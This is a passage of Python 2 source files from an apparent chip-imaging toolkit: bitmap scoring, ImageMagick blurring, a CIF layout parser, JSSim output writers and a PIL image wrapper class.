for biti, score in enumerate(scoresn):
scorei = int(255 * (1 - score))
x = biti % BIT_WH
y = biti / BIT_WH
im.putpixel((x, y), (scorei, scorei, scorei))
im.save(fn_out)
# Display list of the worst score deltas
def find_worst(j, dir_out, worstn=6):
results = []
xyindex = {}
for runi, run in enumerate(j['runs']):
col, row = run['meta']['glob_loc']
# run['res'][run['bestk']]
score = abs(math.log(run['res'][1], 10) - math.log(run['res'][0], 10))
results.append((score, run))
xyindex[(col, row)] = runi
results = sorted(results)
def printr(i):
score, run = results[i]
#print run
m = run['meta']
print 'Score %f' % score
print ' fn: %s' % m['im_fn']
print ' tile_loc: %s' % (m['tile_loc'],)
print ' Actual: %s' % run['ref']
print ' Result: %s' % run['bestk']
print ' POIs'
for poi in run['pois']:
print ' %g' % poi
print ' us'
lr = m['lr']
for poi in run['pois']:
for bit in xrange(2):
k = '%d%s' % (bit, lr)
print ' %s' % k
for v in j['us'][k]:
print ' %g' % (v,)
print ' Scores'
for res in run['res']:
print ' %g' % res
print 'Worst %d results' % worstn
for i in xrange(worstn):
printr(i)
# Find what percentile had errors
# Work backwards until we find an error
last_err = -1
for i, result in enumerate(results):
score, run = result
m = run['meta']
if run['ref'] is not None and run['ref'] != run['bestk']:
last_err = i
if 0:
im_full = Image.open(m['im_fn'])
crop = m['crop']
im_tile = im_full.crop(crop)
im_tile.save(os.path.join(dir_out, '%d.png' % i))
# This number should be very small
    # Otherwise errors are going undetected despite having a bad score
print
print 'Last error at %d / %d: %0.1f%%' % (last_err, len(results), 100.0 * last_err / len(results))
if last_err >= 0:
printr(last_err)
if 1:
i = last_err
score, run = results[i]
m = run['meta']
im_full = Image.open(m['im_fn'])
# crop = (xmin, ymin, xmin + imwh, ymin + imwh)
crop = m['crop']
im_tile = im_full.crop(crop)
#im_tile.show()
im_tile.save(os.path.join(dir_out, 'worst.png'))
print
print 'Known bad'
badb = 0
badn = 0
for x,y in [(35, 150), (36, 150), (13, 158), (38, 190), (30, 239)]:
i = xyindex[(x, y)]
printr(i)
score, run = results[i]
m = run['meta']
# This whole region should be 0's
if run['bestk'] == 1:
badb += 1
badn += 1
print 'Failed %d / %d' % (badb, badn)
def bitmap(j, fn_out):
im = Image.new("RGB", (BIT_WH, BIT_WH), "black")
# Start by building a map of all of the scores
scores = np.zeros(BIT_WH * BIT_WH)
for run in j['runs']:
col, row = run['meta']['glob_loc']
if run['bestk']:
im.putpixel((col, row), (255, 255, 255))
im.save(fn_out)
def run(fn):
print 'Loading'
j = json.load(open(fn, 'r'))
print 'Ready'
dir_out = os.path.dirname(fn)
#bitmap(j, os.path.join(dir_out, 'bitmap.png'))
#heatmap(j, os.path.join(dir_out, 'confidence_rg.png'), True)
#heatmap(j, os.path.join(dir_out, 'confidence_bw.png'), False)
find_worst(j, dir_out)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Grid auto-bitmap test')
parser.add_argument('fn', help='image file to process')
args = parser.parse_args()
run(args.fn)
```
#### File: pr0ntools/image/soften.py
```python
from pr0ntools.temp_file import ManagedTempFile
import os
import time
import subprocess
import sys
def soften_gauss(src_fn, dst_fn=None):
'''
http://www.imagemagick.org/Usage/convolve/#soft_blur
convert face.png -morphology Convolve Gaussian:0x3 face_strong_blur.png
convert face.png face_strong_blur.png \
-compose Blend -define compose:args=60,40% -composite \
face_soft_blur.png
If dest_file_name is not given, done in place
'''
sys.stdout.flush()
if not os.path.exists(src_fn):
raise Exception('Soften input file name missing')
if dst_fn is None:
dst_fn = src_fn
args = ["convert"]
args.append(src_fn)
args.append("-morphology")
args.append("Convolve")
args.append("Gaussian:0x3")
args.append(dst_fn)
print 'going to execute: %s' % (args,)
# Specifying nothing completely throws away the output
subp = subprocess.Popen(args, stdout=None, stderr=None, shell=False)
subp.communicate()
print 'Execute done, rc: %s' % (subp.returncode,)
if not subp.returncode == 0:
raise Exception('soften failed')
    # having some problems that look like the file isn't getting written to disk
# monitoring for such errors
# remove if I can root cause the source of these glitches
for i in xrange(30):
if os.path.exists(dst_fn):
break
if i == 0:
print 'WARNING: soften missing strong blur dest file name %s, waiting a bit...' % (dst_fn,)
time.sleep(0.1)
else:
raise Exception('Missing soften strong blur output file name %s' % dst_fn)
def soften_composite(src_fn, dst_fn=None):
tmp_file = ManagedTempFile.from_same_extension(src_fn)
soften_gauss(src_fn, tmp_file.file_name)
if dst_fn is None:
dst_fn = src_fn
args = ["convert"]
args.append(src_fn)
args.append(tmp_file.file_name)
args.append("-compose")
args.append("Blend")
args.append("-define")
args.append("compose:args=60,40%")
args.append("-composite")
# If we got a dest file, use it
args.append(dst_fn)
print 'going to execute: %s' % (args,)
subp = subprocess.Popen(args, stdout=None, stderr=None, shell=False)
subp.communicate()
print 'Execute done, rc: %s' % (subp.returncode,)
if not subp.returncode == 0:
raise Exception('failed to form strong blur')
    # having some problems that look like the file isn't getting written to disk
# monitoring for such errors
# remove if I can root cause the source of these glitches
for i in xrange(30):
if os.path.exists(dst_fn):
break
if i == 0:
print 'WARNING: soften missing strong blur dest file name %s, waiting a bit...' % (dst_fn,)
time.sleep(0.1)
else:
raise Exception('Missing soften strong blur output file name %s' % dst_fn)
```
#### File: jssim/cif/parser.py
```python
BOX_MAX = 200
BOX_MAX = None
box_limit = 0
g_print_result = False
if False:
from pr0ntools.jssim.layer import UVPolygon, Net, Nets, PolygonRenderer, Point
#g_print_result = True
clip_x_min = 250
clip_x_max = 360
clip_y_min = 150
clip_y_max = 250
# Flip since working coordinate system in flipped?
if True:
width = 1319
height = 820
clip_y_min = height - clip_y_min
clip_y_max = height - clip_y_max
g_limit_polygon = UVPolygon.from_rect_ex(clip_x_min, clip_y_min, clip_x_max - clip_x_min + 1, clip_y_max - clip_y_min + 1)
g_limit_polygon.color = 'white'
else:
g_limit_polygon = None
g_default_scalar = 0.007
#g_default_scalar = 1.0
class Layer:
# FIGURE B.1 CIF layer names for MOS processes.
# NM nMOS metal
NM = 'NM'
# NP nMOS polysilicon
NP = 'NP'
# ND nMOS diffusion
ND = 'ND'
# NC nMOS contact
NC = 'NC'
# NI nMOS implant
NI = 'NI'
# NB nMOS buried
NB = 'NB'
# NG nMOS overglass
NG = 'NG'
# CMF CMOS metal 1
CMF = 'CMF'
# CMS CMOS metal 2
CMS = 'CMS'
# CPG CMOS polysilicon
CPG = 'CPG'
# CAA CMOS active
CAA = 'CAA'
# CSG CMOS select
CSG = 'CSG'
# CWG CMOS well
CWG = 'CWG'
# CC CMOS contact
CC = 'CC'
# CVA CMOS via
CVA = 'CVA'
# COG CMOS overglass
COG = 'COG'
def __init__(self):
self.boxes = list()
self.id = None
@staticmethod
def str2id(s):
# Simple mapping right now
return s.upper()
def add_box(self, width, height, xpos, ypos, rotation = None):
box = Box(width, height, xpos, ypos, rotation)
self.boxes.append(box)
class Statement:
def __init__(self):
pass
class Subroutine:
def __init__(self):
self.number = None
# Strings, reparse every time
self.statements = list()
self.scale_numerator = None
self.scale_denominator = None
def add(self, statement):
self.statements.append(statement)
def call(self, parser):
scalar = self.scale_numerator / self.scale_denominator
for statement in self.statements:
parser.parse_statement(statement, scalar)
class Label:
def __init__(self, text = None, x = None, y = None, layer_id = None):
self.x = x
self.y = y
self.text = text
self.layer_id = layer_id
class Box:
def __init__(self, width, height, xpos, ypos, rotation = None):
if width == 0:
raise Exception('0 width')
if height == 0:
raise Exception('0 height')
self.width = width
self.height = height
self.xpos = xpos
self.ypos = ypos
self.rotation = rotation
class Parser:
'''
Initially created to parse 4003.cif
Makes use of the following constructs:
-(): comment
-Layers
-L ND: nMOS diffusion
-L NP: nMOS poly
-L NC: nMOS contact
-L NM: nMOS metal
-Procedural
-DS: def start
-DF def finish
-C call def
-B: box
-9: Cell name
-94: Label
-E: end
'''
def __init__(self):
global g_default_scalar
# maximized for 4003 on 1680 X 1040 screen...
# need to implement scrolling or something
self.scalar = g_default_scalar
#self.generator = None
self.file_name = None
# File object
self.f = None
self.cell_name = None
# layer ID => layer object
self.layers = dict()
# Transform into more polygon friendly form
self.corner_coordinates = True
# number => object
self.subroutines = dict()
# Being parsed, not running
self.cur_subroutine = None
self.labels = list()
self.active_layer = None
# Figure these out as we go along
self.width = 0
self.height = 0
def add_box(self, width, height, xpos, ypos, rotation = None):
self.width = max(self.width, xpos + width)
self.height = max(self.height, ypos + height)
self.active_layer.add_box(width, height, xpos, ypos, rotation)
def add_label(self, text, x, y, layer_id):
self.width = max(self.width, x)
self.height = max(self.height, y)
l = Label(text, x, y, layer_id)
self.labels.append(l)
@staticmethod
def parse(file_name):
parser = Parser()
#parser.generator = generator()
parser.file_name = file_name
parser.run()
return parser
def remove_comments(self, text):
# ( CIF conversion of visual6502 polygon data );
while True:
start = text.find('(')
if start < 0:
break
end = text.find(')')
if end < 0:
                raise Exception('Malformed CIF: cannot locate closing ) in %s' % text)
text = text[0:start] + text[end + 1:]
#print 'filtered: ' + text
return text
def next_statement(self):
ret = ''
while True:
c = self.f.read(1)
if len(c) == 0:
if len(ret) == 0:
return None
break
if c == ';':
break
ret += c
return self.remove_comments(ret).strip()
def parse_statement(self, statement, scalar = None):
'''Must be comment free and stripped of extra spaces. Return True on end'''
global box_limit
global g_limit_polygon
# Skip blanks
if statement == '':
return False
if False:
scalar = 1.0
self.scalar = 1.0
#print 'Parising %s' % statement
parts = statement.split()
key = parts[0].upper()
print_orig = g_print_result
if self.cur_subroutine:
if key == "DF":
if self.cur_subroutine is None:
raise Exception('DF without DS')
# Note that we correctly drop the old routine if unneeded
self.subroutines[self.cur_subroutine.number] = self.cur_subroutine
# Not sure if this is true, but it seems logical anyway
self.active_layer = None
self.cur_subroutine = None
return False
else:
self.cur_subroutine.add(statement)
return False
ret = False
if key == "E":
ret = True
elif key == "L":
layer_id = Layer.str2id(parts[1])
# Hmm can you switch layers? Probably
if layer_id in self.layers:
self.active_layer = self.layers[layer_id]
else:
self.active_layer = Layer()
self.active_layer.id = layer_id
self.layers[layer_id] = self.active_layer
if BOX_MAX:
box_limit = 0
elif key == "C":
'''
Call a subroutine
Syntax:
C <number>
'''
self.subroutines[int(parts[1])].call(self)
print_orig = False
elif key == "DS":
'''
Define the start of a subroutine
Syntax:
                DS <number> <scale numerator> <scale denominator>
'''
subroutine = Subroutine()
subroutine.number = int(parts[1])
subroutine.scale_numerator = int(parts[2])
subroutine.scale_denominator = int(parts[3])
self.cur_subroutine = subroutine
print_orig = False
elif key == "B":
print_orig = False
if BOX_MAX:
if box_limit == BOX_MAX:
print 'Last accepted box: ' + repr(statement)
if box_limit > BOX_MAX:
return False
box_limit += 1
'''
Syntax:
B <length> <width> <xpos> <ypos> [rotation] ;
'''
if self.active_layer is None:
raise Exception('Must be in layer to use box')
'''
B length width xpos ypos [rotation] ;
a box the center of which is at (xpos, ypos) and is length across in x and width tall in y.
However, I don't like dealing with that so I'm translating
'''
width_orig = int(parts[1])
height_orig = int(parts[2])
xpos_orig = int(parts[3])
ypos_orig = int(parts[4])
width = width_orig * self.scalar
height = height_orig * self.scalar
xpos = xpos_orig * self.scalar
ypos = ypos_orig * self.scalar
# Lambda design rules FTW
if not scalar is None:
xpos *= scalar
ypos *= scalar
width *= scalar
height *= scalar
xpos_corner = xpos - width / 2.0
ypos_corner = ypos - height / 2.0
perform_action = True
if g_limit_polygon:
feature_poly = UVPolygon.from_rect_ex(xpos_corner, ypos_corner, width, height)
if not g_limit_polygon.intersects(feature_poly):
perform_action = False
if perform_action:
# Should truncate to int? Don't do it unless it becomes a problem
rotation = None
if len(parts) >= 6:
rotation = int(parts[5])
if self.corner_coordinates:
self.add_box(width, height, xpos_corner, ypos_corner, rotation)
else:
self.add_box(width, height, xpos, ypos, rotation)
if g_print_result:
rotation_str = ''
if not rotation is None:
rotation_str = ' %d' % rotation
width_i = int(width)
height_i = int(height)
# Skip invalid geometries
if not width_i == 0 and not height_i == 0:
print 'B %d %d %d %d%s;' % (width_i, height_i, int(xpos + width / 2.0), int(ypos + height / 2.0), rotation_str)
elif key == "9":
'''
Cell name
Syntax:
9 <text>
Ignore, unused for now
'''
self.cell_name = statement[2:]
elif key == "94":
'''
Label
Syntax:
94 <label token> <x> <y> [layer]
'''
text = parts[1]
x = int(int(parts[2]) * self.scalar)
y = int(int(parts[3]) * self.scalar)
# Lambda design rules FTW
if not scalar is None:
x *= scalar
y *= scalar
layer_id = None
if len(parts) >= 5:
layer_str = parts[4]
                layer_id = Layer.str2id(layer_str)
self.add_label(text, x, y, layer_id)
if g_print_result:
print_orig = False
                printed_layer_str = ''
                if not layer_id is None:
                    printed_layer_str = ' %s' % layer_id
                print '94 %s %d %d%s;' % (text, x, y, printed_layer_str)
else:
raise Exception("Couldn't parse statement %s" % statement)
if print_orig:
print statement + ';'
return ret
def run(self):
'''
http://en.wikipedia.org/wiki/Caltech_Intermediate_Form
0 x y layer N name; Set named node on specified layer and position
0V x1 y1 x2 y2 ... xn yn; Draw vectors
2A "msg" T x y; Place message above specified location
2B "msg" T x y; Place message below specified location
2C "msg" T x y; Place message centered at specified location
2L "msg" T x y; Place message left of specified location
2R "msg" T x y; Place message right of specified location
4A lowx lowy highx highy; Declare cell boundary
4B instancename; Attach instance name to cell
4N signalname x y; Labels a signal at a location
9 cellname; Declare cell name
91 instancename; Attach instance name to cell
94 label x y; Place label in specified location
Need to support this to assign nets
95 label length width x y; Place label in specified area
FIGURE B.5 Typical user extensions to CIF.
'''
self.f = open(self.file_name, 'r')
while True:
l = self.next_statement()
if l is None:
break
if self.parse_statement(l):
break
import sys
#print 'Debug break'
#sys.exit(1)
```
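To make the supported subset concrete, here is a small sketch that writes a tiny CIF file using only constructs handled above (comment, cell name, layer select, box, label, end) and feeds it through the parser; the geometry and names are invented, and it assumes the Parser class above is importable.
```python
cif_text = (
    "( tiny example, invented for illustration );\n"
    "9 demo_cell;\n"
    "L NM;\n"
    "B 40 20 100 60;\n"
    "94 vcc 100 60 NM;\n"
    "E;\n"
)
with open("demo.cif", "w") as f:
    f.write(cif_text)
p = Parser.parse("demo.cif")
print p.cell_name                # demo_cell
print p.layers.keys()            # ['NM']
print len(p.layers['NM'].boxes)  # 1
print p.labels[0].text           # vcc
```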
#### File: jssim/files/nodenames.py
```python
from pr0ntools.jssim.options import Options
from util import get_js_file_header
class NodeName:
def __init__(self, name=None, net=None):
# string
self.name = name
# int
self.net = net
def run_DRC(self):
pass
def __repr__(self):
# clk0: 4,
return '%s: %u' % (self.name, self.net)
class NodeNames:
def __init__(self):
self.nodenames = list()
def run_DRC(self):
names = set(['gnd', 'vcc', 'clk0', 'reset'])
found = set()
for nodename in self.nodenames:
name = nodename.name
print 'Node %s => %u' % (name, nodename.net)
if name in names:
found.add(name)
if not 'gnd' in found:
raise Exception('Missing gnd node name')
if not 'vcc' in found:
raise Exception('Missing vcc node name')
# Not strictly necessary but in all the designs I've done so far
if not 'clk0' in found:
raise Exception('Missing clk0 node name')
if not 'reset' in found:
print 'WARNING: missing reset node name'
#raise Exception('Missing reset node name')
pass
def add(self, nodename):
self.nodenames.append(nodename)
def __repr__(self):
'''Return nodenames.js content'''
'''
var nodenames ={
gnd: 2,
vcc: 1,
out1: 3,
in1: 4,
clk0: 4,
}
'''
ret = get_js_file_header(Options.JS_FILE_NODENAMES, Options.NODENAMES_VER)
ret += 'var nodenames_ver = "%s";\n' % Options.NODENAMES_VER
ret += 'var nodenames = {\n'
for nodename in self.nodenames:
# Having , at end is acceptable
ret += repr(nodename) + ',\n'
ret += '}\n'
return ret
def write(self):
f = open(Options.JS_FILE_NODENAMES, 'w')
f.write(self.__repr__())
f.close()
```
#### File: jssim/files/transdefs.py
```python
from pr0ntools.jssim.options import Options
from util import get_js_file_header
class Transdef:
'''
WARNING: needs coordinates in lower left, standard is upper left
(Ijor's?) comment from 6800's transdefs:
/*
* The format here is
* name
* gate,c1,c2
* bb (bounding box: xmin, xmax, ymin, ymax)
* geometry (unused) (width1, width2, length, #segments, area)
* weak (boolean) (marks weak transistors, whether pullups or pass gates)
*
* Note: the geometry is of the MOSFET channel: the two widths are
* the lengths of the two edges where the poly is crossing the active
* area. These will be equal if the channel is straight or makes an
* equal number of right and left turns. The number of segments should
* be 1 for a rectangular channel, or 2 for an L shape, 3 for a Z
* or U, and will allow for taking into account corner effects.
*
* At time of writing JSSim doesn't use transistor strength information
* except to discard weak transistors and to treat pullups as
* described in segdefs.js specially.
*
*/
'''
def __init__(self, name=None, gate=None, c1=None, c2=None, bb=None, geometry=None, weak=None):
# string
self.name = name
# int
self.gate = gate
# int
self.c1 = c1
# int
self.c2 = c2
# 4 element list
self.bb = bb
# list / structure
self.geometry = geometry
# boolean
self.weak = weak
self.run_DRC()
def run_DRC(self):
pass
def __repr__(self):
#['t1',4,2,3,[176,193,96,144],[415,415,11,5,4566],false],
ret = '['
ret += "'%s',%u,%u,%u" % (self.name, self.gate, self.c1, self.c2)
ret += ",[%u,%u,%u,%u]" % (self.bb[0], self.bb[1], self.bb[2], self.bb[3])
ret += ",[%u,%u,%u,%u,%u]" % (self.geometry[0], self.geometry[1], self.geometry[2], self.geometry[3], self.geometry[4])
if self.weak:
ret += ",true"
else:
ret += ",false"
ret += ']'
return ret
class Transdefs:
def __init__(self):
self.transdefs = list()
def __repr__(self):
ret = get_js_file_header(Options.JS_FILE_TRANSDEFS, Options.TRANSDEFS_VER)
        ret += 'var transdefs_ver = "%s";\n' % Options.TRANSDEFS_VER
ret += 'var transdefs = [\n'
for transdef in self.transdefs:
# Having , at end is acceptable
ret += repr(transdef) + ',\n'
ret += ']\n'
return ret
def add(self, transdef):
self.transdefs.append(transdef)
def write(self):
f = open(Options.JS_FILE_TRANSDEFS, 'w')
f.write(self.__repr__())
f.close()
```
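A minimal sketch of building one transistor definition and rendering it in the transdefs.js format; the numbers mirror the example line quoted in `__repr__` above and carry no other meaning.
```python
t = Transdef(name='t1', gate=4, c1=2, c2=3,
             bb=[176, 193, 96, 144],
             geometry=[415, 415, 11, 5, 4566],
             weak=False)
print repr(t)   # ['t1',4,2,3,[176,193,96,144],[415,415,11,5,4566],false]
```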
#### File: pr0ntools/jssim/transistor.py
```python
class TechnologyW:
def __init__(self, has_nmos, has_pmos, has_bipolar):
self.nmos = has_nmos
self.pmos = has_pmos
self.bipolar = has_bipolar
def has_nmos(self):
return self.nmos
def has_pmos(self):
return self.pmos
def has_bipolar(self):
return self.bipolar
class Technology:
'''
By no means a comprehensive list, just a start of what *might* be needed in near future
'''
# Just kidding
# ROCK = TechnologyW(False, False, False)
INVALID = None
# Uses bipolar transistors (ex: TTL)
BIPOLAR = TechnologyW(False, False, True)
# N-channel MOS
NMOS = TechnologyW(True, False, False)
# P-channel MOS
PMOS = TechnologyW(False, True, False)
# N-channel and P-channel MOS on the same chip
CMOS = TechnologyW(True, True, False)
# BiCMOS: mix of bipolar and CMOS
BICMOS = TechnologyW(True, True, True)
@staticmethod
def from_string(s):
s = s.upper()
if s == "BIPOLAR":
return Technology.BIPOLAR
elif s == "NMOS":
return Technology.NMOS
elif s == "PMOS":
return Technology.PMOS
elif s == "CMOS":
return Technology.CMOS
elif s == "BICMOS":
return Technology.BICMOS
else:
return Technology.INVALID
'''
Not really needed for anything yet
class LogicFamily:
INVALID = 0
'''
class Transistor:
'''
JSSim likes c1 more "interesting" than c2
Try to make c1 be the variable connection and c2 constant if applicable
'''
def __init__(self, g=None, c1=None, c2=None):
# These should be Net objects, not numbers
# gate
self.g = g
# connection1
self.c1 = c1
# connection2
self.c2 = c2
# Rectangle (two Point's)
self.rect_p1 = None
self.rect_p2 = None
self.weak = None
def set_bb(self, point1, point2):
self.rect_p1 = point1
self.rect_p2 = point2
def __repr__(self):
return 'c1: %u, g: %u, c2: %u, weak: %s' % (self.c1.number, self.g.number, self.c2.number, repr(self.weak))
class Transistors:
def __init__(self):
# no particular order
self.transistors = set()
def add(self, transistor):
self.transistors.add(transistor)
```
#### File: pr0ntools/pr0ntools/pimage.py
```python
from PIL import Image
import os
# needed for PNG support
# rarely used and PIL seems to have bugs
PALETTES = bool(os.getenv('PR0N_PALETTES', ''))
class PImage:
# We do not copy array, so be careful with modifications
def __init__(self, image):
# A PIL Image object
self.image = None
self.temp_file = None
if image is None:
raise Exception('cannot construct on empty image')
self.image = image
def debug_print(self, char_limit = None, row_label = False):
for y in range(0, self.height()):
row_label_str = ''
if row_label:
row_label_str = '%02d: ' % y
print row_label_str + self.debug_row_string(y, char_limit, row_label_str)
def debug_row_string(self, y, char_limit = None, row_label = None):
if row_label is None:
row_label = ''
ret = row_label
x_max = self.width()
for x in range(0, x_max):
if not x == 0:
ret += " "
ret += "% 4s" % repr(self.get_pixel(x, y))
if char_limit and len(ret) > char_limit:
ret = ret[0:char_limit]
break
return ret
# To an Image
def to_image(self):
return self.image
'''
First step in scaling is to take off any whitespace
This normalizes the spectra
Returns a new image that is trimmed
'''
def trim(self):
(image, _x_min, _x_max, _y_min, _y_max) = self.trim_verbose()
return image
def trim_verbose(self):
#print 'Trimming: start'
# Set to lowest set pixel
# Initially set to invalid values, we should replace them
        # I'm sure there are more efficient algorithms, but this "just works" until we need to up performance
# What we probably should do is scan in from all sides until we hit a value and then stop
x_min = self.width()
x_max = -1
y_min = self.height()
y_max = -1
for y in range(0, self.height()):
for x in range(0, self.width()):
# print "%s != %s" % (self.get_pixel(x, y), self.white())
# if set, we have a value influencing the result
if self.get_pixel(x, y) != self.white():
x_min = min(x_min, x)
y_min = min(y_min, y)
x_max = max(x_max, x)
y_max = max(y_max, y)
#print (x_min, x_max, y_min, y_max)
#print 'Trimming: doing subimage'
return (self.subimage(x_min, x_max, y_min, y_max), x_min, x_max, y_min, y_max)
def save(self, *args, **kwargs):
'''save(file name[, format, kw options]) where kw_options includes quality=<val>'''
self.image.save(*args, **kwargs)
def get_scaled(self, factor, filt = None):
if filt is None:
filt = Image.NEAREST
i = self.image.resize((int(self.width() * factor), int(self.height() * factor)), filt)
return PImage.from_image(i)
'''
Given exclusive end array bounds (allows .width() convenience)
returns a new image trimmed to the given bounds
Truncates the image if our array bounds are out of range
Maybe we should throw exception instead?
'''
def subimage(self, x_min, x_max, y_min, y_max):
if x_min is None:
x_min = 0
if x_max is None:
x_max = self.width()
if y_min is None:
y_min = 0
if y_max is None:
y_max = self.height()
#print 'subimage: start. x_min: %d: x_max: %d, y_min: %d, y_max: %d' % (x_min, x_max, y_min, y_max)
if x_min < 0 or y_min < 0 or x_max < 0 or y_max < 0:
print x_min, y_min, x_max, y_max
raise Exception('out of bounds')
# Did we truncate the whole image?
if x_min > x_max or y_min > y_max:
return self.from_array([], self.get_mode(), self.get_mode())
'''
height = y_max - y_min + 1
width = x_max - x_min + 1
array_out = [[0 for i in range(width)] for j in range(height)]
for cur_height in range(0, height):
for cur_width in range(0, width):
array_out[cur_height][cur_width] = self.get_pixel(cur_height + y_min, cur_width + x_min)
#print 'subimage: beginning from array'
return self.from_array(array_out, self.get_mode(), self.get_mode())
'''
# 4-tuple (x0, y0, x1, y1)
#print 'x_min: %d, y_min: %d, x_max: %d, y_max: %d' % (x_min, y_min, x_max, y_max)
# This is exclusive, I want inclusive
return PImage.from_image(self.image.crop((x_min, y_min, x_max, y_max)))
def copy(self):
return self.subimage(None, None, None, None)
def rotate(self, degrees):
return PImage.from_image(self.image.rotate(degrees))
def width(self):
return self.image.size[0]
def height(self):
return self.image.size[1]
def set_pixel(self, x, y, pixel):
self.image.putpixel((x, y), pixel)
def get_pixel(self, x, y):
try:
return self.image.getpixel((x, y))
except:
print 'bad pixel values, x: %d, y: %d' % (x, y)
raise
# The following are in case we change image mode
def black(self):
'''return the instance's representation of black'''
mode = self.get_mode()
if mode == "1":
return 1
if mode == "L":
return 0
if mode == "RGB":
return (255, 255, 255)
raise Exception('Bad mode %s' % mode)
def white(self):
'''return the instance's representation of white'''
mode = self.get_mode()
if mode == "1":
return 0
if mode == "L":
return 255
if mode == "RGB":
return (0, 0, 0)
raise Exception('Bad mode %s' % mode)
def pixel_to_brightness(self, pixel):
'''Convert pixel to brightness value, [0.0, 1.0] where 0 is white and 1 is black'''
        # The above range was chosen somewhat arbitrarily as that's what old code did (I think because that's what "1" mode does)
        # Also, it makes it convenient for summing up "filled" areas as we usually assume an (infinite) white background
mode = self.get_mode()
if mode == "1":
# TODO: double check this is correct, that is 0 is white and 1 is black
return pixel * 1.0
if mode == "L":
# 255 is white
return 1.0 - (1 + pixel) / 256.0
if mode == "RGB":
# RGB represents (255, 255, 255) as white since all colors are at max
# Also scale to the range correctly by adding 3 and then invert to make it luminescence
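            # e.g. pure white (255, 255, 255) -> 0.0, pure black (0, 0, 0) -> ~0.996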
return 1.0 - (pixel[0] + pixel[1] + pixel[2] + 3) / (256.0 * 3)
raise Exception('Bad mode %s' % mode)
def get_mode(self):
return self.image.mode
def file_name(self):
return self.image.fp.name
def set_canvas_size(self, width, height):
# Simple case: nothing to do
        if self.width() == width and self.height() == height:
return
ip = Image.new(self.image.mode, (width, height))
if PALETTES and self.image.palette:
ip.putpalette(self.image.palette)
ip.paste(self.image, (0,0))
# Shift the old image out
self.image = ip
def paste(self, img, x, y):
#self.image.paste(img, (x, y))
# left, upper, right, and lower
self.image.paste(img.image, (x, y, x + img.width(), y + img.height()))
@staticmethod
def from_file(path):
'''
I'm having difficulty dealing with anything paletted, so convert everything right off the bat
'''
if not type(path) in (str, unicode):
raise Exception("Bad path %s" % path)
img = Image.open(path)
if img is None:
raise Exception("Couldn't open image file: %s" % path)
if False:
img_converted = img.convert('L')
return PImage.from_image(img_converted)
else:
return PImage.from_image(img)
@staticmethod
def from_image(image):
return PImage(image)
@staticmethod
def from_blank(width, height, mode="RGB"):
'''Create a blank canvas'''
return PImage.from_image(Image.new(mode, (width, height)))
@staticmethod
def from_fns(*args, **kwargs):
return PImage.from_image(from_fns(*args, **kwargs))
@staticmethod
def from_unknown(image, trim=False):
if isinstance(image, str):
ret = PImage.from_file(image)
elif isinstance(image, PImage):
ret = image
        elif isinstance(image, Image.Image):
ret = PImage.from_image(image)
else:
raise Exception("unknown parameter: %s" % repr(image))
if trim:
ret = ret.trim()
return ret
@staticmethod
def get_pixel_mode(pixel):
'''Tries to guess pixel mode. Hack to transition some old code, don't use this'''
# FIXME: make sure array mode matches our created image
if type(pixel) == type(0):
return "L"
if len(pixel) == 3:
return 'RGB'
else:
return "L"
@staticmethod
def from_array(array, mode_in = None, mode_out = None):
'''
array[y][x]
'''
#print 'from_array: start'
# Make a best guess, we should probably force it though
if mode_in is None:
mode_in = PImage.get_pixel_mode(array[0][0])
if mode_out is None:
mode_out = mode_in
ret = None
height = len(array)
if height > 0:
width = len(array[0])
if width > 0:
# (Xsize, Ysize)
# Feed in an arbitrary pixel and assume they are all encoded the same
# print 'width: %d, height: %d' % (width, height)
ret = PImage(Image.new(mode_out, (width, height), "White"))
for y in range(0, height):
for x in range(0, width):
# print 'x: %d, y: %d' % (x, y)
ret.set_pixel(x, y, array[y][x])
if ret is None:
ret = PImage(Image.new(mode_out, (0, 0), "White"))
#print 'from_array: end'
return ret
@staticmethod
def is_image_filename(filename):
return filename.find('.tif') > 0 or filename.find('.jpg') > 0 or filename.find('.png') > 0 or filename.find('.bmp') > 0
def from_fns(images_in, tw=None, th=None):
'''
Return an image constructed from a 2-D array of image file names
[[r0c0, r0c1],
[r1c0, r1c1]]
'''
mode = None
rows = len(images_in)
cols = len(images_in[0])
im = None
src_last = None
# Ensure all images loaded
for rowi in range(rows):
row = images_in[rowi]
if len(row) != cols:
raise Exception('row size mismatch')
for coli in range(cols):
# Ensure its a PImge object
src = images_in[rowi][coli]
if src is None:
# Can we make a best guess on what to fill in?
if not src_last:
continue
# im should in theory work but accessing pixels
# is for some reason causing corruption
iml = Image.open(src_last)
imf = Image.new(mode, (tw, th))
if PALETTES:
imf.putpalette(iml.palette)
pix = iml.getpixel((tw - 1, th - 1))
imf.paste(pix, (0, 0, tw, th))
images_in[rowi][coli] = imf
else:
im = Image.open(src)
imw, imh = im.size
if mode is None:
mode = im.mode
elif im.mode != mode:
raise Exception('mode mismatch')
if tw is None:
tw = imw
elif tw != imw:
raise Exception('tile width mismatch: %s has %s vs %s' % (src, tw, imw))
if th is None:
th = imh
elif th != imh:
raise Exception('tile height mismatch')
images_in[rowi][coli] = im
src_last = src or src_last
# Images are now all either PImage or None with uniform width/height
width = tw * cols
height = th * rows
ret = Image.new(mode, (width, height))
# Copy palette over from last png, if possible
if PALETTES and im and im.palette:
ret.putpalette(im.palette)
#ret = im.copy()
#ret.resize((width, height))
for rowi in range(rows):
for coli in range(cols):
src = images_in[rowi][coli]
# Allowed to be empty
if src:
# (left, upper)
cpix = coli * tw
rpix = rowi * th
ret.paste(src, (cpix, rpix))
#ret = im_reload(ret)
return ret
# Change canvas, shifting pixels to fill it
def rescale(im, factor, filt=Image.NEAREST):
w, h = im.size
ret = im.resize((int(w * factor), int(h * factor)), filt)
# for some reason this breaks the image
    # but for other similar operations it's required
if 0 and im.palette:
ret.putpalette(im.palette)
return ret
# Change canvas, not filling in new pixels
def resize(im, width, height, def_color=None):
if PALETTES and im.palette:
# Lower right corner is a decent default
# since will probably have a (black) border
xy = tuple([x - 1 for x in im.size])
def_color = im.getpixel(xy)
ret = Image.new(im.mode, (width, height), def_color)
# WARNING: workaround for PIL bugs
# don't use putpalette(im.palette)
# it mixes up RGB and RGB;L
ret.putpalette(im.palette.tobytes())
else:
ret = Image.new(im.mode, (width, height))
ret.paste(im, (0, 0))
return ret
def im_reload(im):
im.save('/tmp/pt_pil_tmp.png')
return Image.open('/tmp/pt_pil_tmp.png')
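# Usage sketch for the helpers above (file names are placeholders):
#   img = PImage.from_file('tile_r0c0.png')
#   canvas = PImage.from_blank(img.width() * 2, img.height(), mode=img.image.mode)
#   canvas.paste(img, 0, 0)
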